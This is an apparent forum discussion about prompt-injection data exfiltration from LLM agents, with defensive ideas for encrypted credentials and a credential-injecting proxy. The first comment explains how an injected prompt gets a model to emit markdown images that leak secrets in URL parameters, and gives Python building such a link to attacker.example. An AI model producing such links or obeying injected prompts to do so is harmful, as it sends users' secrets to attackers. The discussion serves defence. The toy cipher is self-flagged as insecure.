zlacker

[return to "Superhuman AI Exfiltrates Emails"]
1. 0xferr+TI[view] [source] 2026-01-12 22:39:36
>>takira+(OP)
The primary exfiltration vector for LLM agents is triggering network requests via rendered images, with the sensitive data smuggled out as URL query parameters.
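
Roughly, the trick looks like this: an injected prompt asks the model to emit markdown for an image whose URL carries the secret, and any client that auto-renders images fires the GET for the attacker. A minimal sketch (the domain and the `d` parameter name are placeholders):

```python
from urllib.parse import quote

def exfil_markdown_image(base_url: str, secret: str) -> str:
    # Build the markdown an injected prompt would ask the model to emit.
    # Rendering it issues a GET to the attacker's server, secret attached.
    return f"![logo]({base_url}?d={quote(secret)})"

payload = exfil_markdown_image("https://attacker.example/pixel.png", "a=b")
print(payload)  # ![logo](https://attacker.example/pixel.png?d=a%3Db)
```

This is why clients increasingly block or proxy outbound image loads from model output.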

As Claude Code increasingly uses browser tools, we may need to move away from .env files toward something encrypted, along the lines of Rails credentials, but without the secret key living in the .env.
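
The shape of that scheme, sketched below: the encrypted blob can sit in the repo, while the key lives outside the sandbox entirely. The keystream here is a toy for illustration; a real implementation should use an authenticated cipher like AES-GCM, and all file paths are hypothetical.

```python
import hashlib
import json

def _keystream(key: bytes, n: int) -> bytes:
    # Toy SHA-256 counter keystream, for illustration only. Use a real
    # authenticated cipher (e.g. AES-GCM via the `cryptography` package).
    out = b""
    counter = 0
    while len(out) < n:
        out += hashlib.sha256(key + counter.to_bytes(8, "big")).digest()
        counter += 1
    return out[:n]

def encrypt_credentials(creds: dict, key: bytes) -> bytes:
    plaintext = json.dumps(creds).encode()
    return bytes(a ^ b for a, b in zip(plaintext, _keystream(key, len(plaintext))))

def decrypt_credentials(blob: bytes, key: bytes) -> dict:
    plaintext = bytes(a ^ b for a, b in zip(blob, _keystream(key, len(blob))))
    return json.loads(plaintext)

# The blob ships with the project; the key comes from outside the sandbox
# (a keyfile in the home dir, the OS keychain, etc.) -- never from .env:
#   key = open(os.path.expanduser("~/.config/myapp/master.key"), "rb").read()
#   creds = decrypt_credentials(open("credentials.enc", "rb").read(), key)
```

An agent that can read the repo (or the .env) then only ever sees ciphertext.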

2. xyzzy1+KH1[view] [source] 2026-01-13 09:46:19
>>0xferr+TI
One tactic I've seen used in various setups is a proxy outside the sandbox that augments outbound requests with credentials, secrets, etc., so the model never handles them directly.

Doesn't help in the case where the LLM is processing actually sensitive data, ofc.
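
A minimal sketch of that pattern, assuming a plain-HTTP forward proxy (a real one also needs CONNECT/TLS handling, and the secret store / hostnames here are placeholders):

```python
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse

# Hypothetical secret store: in practice, read from the host keychain or a
# secrets manager. The sandboxed client never sees these values.
SECRETS = {"api.example.com": "Bearer sk-live-placeholder"}

def inject_credentials(host: str, headers: dict) -> dict:
    # Return a copy of the headers with the credential for `host` added.
    out = dict(headers)
    token = SECRETS.get(host)
    if token:
        out["Authorization"] = token
    return out

class AugmentingProxy(BaseHTTPRequestHandler):
    def do_GET(self):
        url = self.path  # clients send an absolute URL in proxy mode
        host = urlparse(url).hostname or ""
        req = urllib.request.Request(url, headers=inject_credentials(host, {}))
        try:
            with urllib.request.urlopen(req) as resp:
                body = resp.read()
                self.send_response(resp.status)
                self.send_header("Content-Length", str(len(body)))
                self.end_headers()
                self.wfile.write(body)
        except Exception as exc:
            self.send_error(502, str(exc))

# HTTPServer(("127.0.0.1", 8888), AugmentingProxy).serve_forever()
```

The sandboxed agent makes unauthenticated requests to the proxy; only the proxy process, outside the sandbox, holds the tokens.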
